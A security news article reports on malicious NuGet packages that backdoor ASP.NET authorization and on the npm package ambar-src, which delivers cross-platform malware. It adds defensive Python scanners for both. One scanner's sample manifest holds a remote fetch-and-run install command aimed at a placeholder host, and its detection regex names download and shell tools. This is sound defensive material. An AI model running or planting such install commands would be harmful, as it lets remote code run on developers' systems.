Security researchers uncover two significant supply chain attacks targeting developers: malicious NuGet packages targeting ASP.NET applications and a rogue npm package delivering cross-platform malware.
Cybersecurity researchers have uncovered two sophisticated supply chain attacks targeting developers through popular package repositories. In one campaign, four malicious NuGet packages designed to compromise ASP.NET web applications have been discovered, while a separate npm package has been found delivering malware across multiple platforms.
ASP.NET Compromised Through Malicious NuGet Packages
Security researchers at Socket have identified four malicious NuGet packages targeting ASP.NET web application developers, designed to steal sensitive data and create persistent backdoors in victim applications. The packages, published between August 12 and 21, 2024, by a user named hamzazaheer, attracted more than 4,500 downloads before being removed following responsible disclosure.
The malicious packages include:
- NCryptYo
- DOMOAuth2_
- IRAOAuth2.0
- SimpleWriter_
"NCryptYo is a stage-1 execution-on-load dropper," explained security researcher Kush Pandya. "When the assembly loads, its static constructor installs JIT compiler hooks that decrypt embedded payloads and deploy a stage-2 binary - a localhost proxy on port 7152 that relays traffic between the companion packages and the attacker's external C2 server, whose address is resolved dynamically at runtime."
The attack chain begins with NCryptYo, which masquerades as the legitimate NCrypto package. It establishes a local proxy that relays traffic to an attacker-controlled command-and-control server. Once this proxy is active, DOMOAuth2_ and IRAOAuth2_ begin transmitting ASP.NET Identity data—including user accounts, role assignments, and permission mappings—through the local proxy to the external infrastructure.
The C2 server responds with authorization rules that the application processes to create persistent backdoors by granting attackers admin roles, modifying access controls, or disabling security checks. SimpleWriter_, disguised as a PDF conversion utility, writes threat actor-controlled content to disk and executes dropped binaries with hidden windows.
"The campaign's objective is not to compromise the developer's machine directly, but to compromise the applications they build," Pandya clarified. "By controlling the authorization layer during development, the threat actor gains access to deployed production applications. When the victim deploys their ASP.NET application with the malicious dependencies, the C2 infrastructure remains active in production, continuously exfiltrating permission data and accepting modified authorization rules."
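The NuGet campaign above works because a package id that looks like a legitimate one (NCryptYo for NCrypto) slips into a project's dependency list unnoticed. The following Python script is an added illustration, not Socket's tooling or anything from the packages described: it parses the `PackageReference` entries of a `.csproj`, flags the four package ids the article names, and also flags ids that closely resemble a constructed allow-list of trusted packages without matching them, the generic typosquat check of which NCryptYo/NCrypto is one instance. The allow-list and the sample project file are constructed for the demonstration.

```python
"""Audit a .csproj for NuGet package references that are known-malicious or
look like typosquats of trusted package ids.

Added example (not Socket's tooling).  The malicious ids come from the
article; the TRUSTED allow-list and SAMPLE_CSPROJ are constructed here.
"""
import difflib
import xml.etree.ElementTree as ET
from typing import List, Tuple

# Package ids reported in the Socket disclosure, lower-cased because NuGet
# package ids are matched case-insensitively.
KNOWN_MALICIOUS = {"ncryptyo", "domoauth2_", "iraoauth2.0", "simplewriter_"}

# Constructed allow-list of ids a team legitimately depends on.  NCrypto is the
# package the article says NCryptYo impersonates.
TRUSTED = {"ncrypto", "newtonsoft.json", "microsoft.aspnetcore.identity"}

# Constructed sample project file so the script runs offline.
SAMPLE_CSPROJ = """<Project Sdk="Microsoft.NET.Sdk.Web">
  <ItemGroup>
    <PackageReference Include="Newtonsoft.Json" Version="13.0.3" />
    <PackageReference Include="NCryptYo" Version="1.0.2" />
    <PackageReference Include="Microsoft.AspNetCore.Identity" Version="2.2.0" />
    <PackageReference Include="SimpleWriter_" Version="1.0.0" />
    <PackageReference Include="Newtonsof.Json" Version="13.0.3" />
  </ItemGroup>
</Project>"""


def package_ids(csproj_xml: str) -> List[str]:
    """Return the Include id of every PackageReference in a .csproj string."""
    root = ET.fromstring(csproj_xml)
    return [el.get("Include") for el in root.iter("PackageReference") if el.get("Include")]


def typosquat_candidates(name: str, trusted=TRUSTED, cutoff: float = 0.85) -> List[str]:
    """Trusted ids that closely resemble *name* without being it.

    An exact (case-insensitive) match is not a typosquat and yields [].
    """
    lowered = name.lower()
    if lowered in trusted:
        return []
    return difflib.get_close_matches(lowered, sorted(trusted), n=3, cutoff=cutoff)


def audit(csproj_xml: str) -> List[Tuple[str, str]]:
    """Return (package_id, reason) findings in project order; [] means nothing flagged."""
    findings = []
    for pid in package_ids(csproj_xml):
        if pid.lower() in KNOWN_MALICIOUS:
            findings.append((pid, "known-malicious"))
            continue
        near = typosquat_candidates(pid)
        if near:
            findings.append((pid, f"resembles trusted package {near[0]}"))
    return findings


if __name__ == "__main__":
    for pid, reason in audit(SAMPLE_CSPROJ):
        print(f"{pid}: {reason}")
```

Run it against a real project by passing the file contents to `audit()`; the blocklist check is exact, while the similarity check is a heuristic (the 0.85 ratio is a constructed threshold) that surfaces candidates for a human to review rather than a verdict.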
Cross-Platform npm Malware
Separately, Tenable disclosed details of a malicious npm package named ambar-src that amassed more than 50,000 downloads before being removed from the JavaScript registry. Uploaded on February 13, 2026, the package leverages npm's preinstall script hook to execute malicious code during installation.
The malware delivers different payloads based on the operating system:
- On Windows: It downloads and executes msinit.exe containing encrypted shellcode, which is decoded and loaded into memory
- On Linux: It fetches a bash script that retrieves an ELF binary functioning as an SSH-based reverse shell client
- On macOS: It drops Apfell, a JavaScript for Automation (JXA) agent from the Mythic C2 framework, capable of reconnaissance, screenshot collection, Chrome data theft, and password capture via fake prompts
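The ambar-src package runs its payload from npm's `preinstall` hook, so a defender's first check on any installed tree is which packages declare install-time scripts at all. The Python script below is an added example, not Tenable's tooling and not the package's own code: it reads `package.json` manifests, lists the lifecycle hooks npm executes during `npm install`, and grades each manifest as clean, needing review, or suspicious when a hook command reaches for the network or a shell interpreter. The sample manifests, the `example.invalid` URL and the regex heuristics are constructed for the demonstration.

```python
"""Flag npm packages whose package.json runs code at install time.

Added example (not Tenable's tooling).  SAMPLE_MANIFESTS and the SUSPICIOUS
heuristics are constructed for this demonstration.
"""
import json
import os
import re
from typing import Dict

# Lifecycle hooks that npm runs automatically during `npm install`.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Constructed heuristics: install commands that download content or hand
# execution to a shell/interpreter deserve a closer look.
SUSPICIOUS = re.compile(
    r"\b(curl|wget|powershell|pwsh|bash\s+-c|sh\s+-c|node\s+-e|Invoke-WebRequest|base64)\b",
    re.I,
)

# Constructed sample manifests: a plain library, a package with a network-
# fetching hook, and a native addon whose install hook is legitimate.
SAMPLE_MANIFESTS = {
    "left-pad-like": json.dumps({"name": "left-pad-like", "version": "1.0.0",
                                 "scripts": {"test": "node test.js"}}),
    "dropper-like": json.dumps({"name": "dropper-like", "version": "0.1.0",
                                "scripts": {"preinstall": "node install.js",
                                            "postinstall": "curl -s http://example.invalid/x.sh | sh"}}),
    "native-addon": json.dumps({"name": "native-addon", "version": "2.3.1",
                                "scripts": {"install": "node-gyp rebuild"}}),
}


def install_hooks(manifest: str) -> Dict[str, str]:
    """Return {hook: command} for every install-time script in a package.json string."""
    scripts = json.loads(manifest).get("scripts") or {}
    return {hook: scripts[hook] for hook in INSTALL_HOOKS if hook in scripts}


def classify(manifest: str) -> str:
    """'clean' (no hooks), 'review' (hooks present), or 'suspicious' (hook matches heuristics)."""
    hooks = install_hooks(manifest)
    if not hooks:
        return "clean"
    if any(SUSPICIOUS.search(cmd) for cmd in hooks.values()):
        return "suspicious"
    return "review"


def scan_manifests(manifests: Dict[str, str]) -> Dict[str, str]:
    """Classify a {package_name: manifest_json} mapping."""
    return {name: classify(body) for name, body in manifests.items()}


def scan_node_modules(root: str) -> Dict[str, str]:
    """Walk an installed node_modules tree and classify every package.json found."""
    results = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        if "package.json" not in filenames:
            continue
        key = os.path.relpath(dirpath, root)
        try:
            with open(os.path.join(dirpath, "package.json"), encoding="utf-8") as fh:
                results[key] = classify(fh.read())
        except (json.JSONDecodeError, UnicodeDecodeError, OSError):
            results[key] = "unparseable"
    return results


if __name__ == "__main__":
    for name, verdict in scan_manifests(SAMPLE_MANIFESTS).items():
        print(f"{name}: {verdict}")
```

Point `scan_node_modules("node_modules")` at a freshly resolved tree to review hooks before they ever run. Running installs with `npm install --ignore-scripts`, or setting `ignore-scripts=true` in `.npmrc`, stops every lifecycle hook from executing, which is why native addons that genuinely need an install step land in the "review" bucket rather than being treated as clean.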
"It employs multiple techniques to evade detection, and drops open-source malware with advanced capabilities, targeting developers on Windows, Linux, and macOS hosts," Tenable researchers noted. The exfiltrated data is sent to a Yandex Cloud domain to blend in with legitimate traffic and bypass corporate network security measures.
Ambar-src is considered a more mature variant of eslint-verify-plugin, another rogue npm package recently flagged by JFrog for dropping Mythic agents. "If this package is installed or running on a computer, that system must be considered fully compromised," Tenable stated. "While the package should be removed, please be aware that because an external entity may have gained full control of the computer, removing the package does not guarantee the elimination of all resulting malicious software."
Analysis and Recommendations
Both campaigns highlight the increasing sophistication of attacks targeting the software supply chain. The NuGet packages share identical build environments, indicating a single threat actor behind the campaign, while the npm package demonstrates advanced cross-platform capabilities.
For developers and organizations, these incidents underscore the critical importance of:
- Implementing package scanning tools before integration
- Verifying package authenticity and checking for unusual activity
- Limiting permissions for development and production environments
- Monitoring network traffic for unusual connections, especially to localhost proxies
- Regularly auditing dependencies for suspicious changes
"Developers must treat third-party packages with the same security scrutiny as code they write themselves," said Pandya. "The fact that these packages masquerade as legitimate utilities shows how attackers are increasingly leveraging trust in the ecosystem."
Organizations should also consider implementing SBOM (Software Bill of Materials) practices to maintain visibility into all components in their software supply chain and respond quickly when threats like these are discovered.
The discovery of these campaigns comes as software supply chain attacks continue to rise, with attackers increasingly targeting developers through trusted repositories to compromise applications at their source. Both Socket and Tenable have responsibly disclosed their findings to the respective package repositories, leading to the removal of the malicious packages before they could cause widespread damage.
For more information on securing your development environment, refer to the OWASP Software Supply Chain Security Guide and the NIST Software Supply Chain Risk Management framework.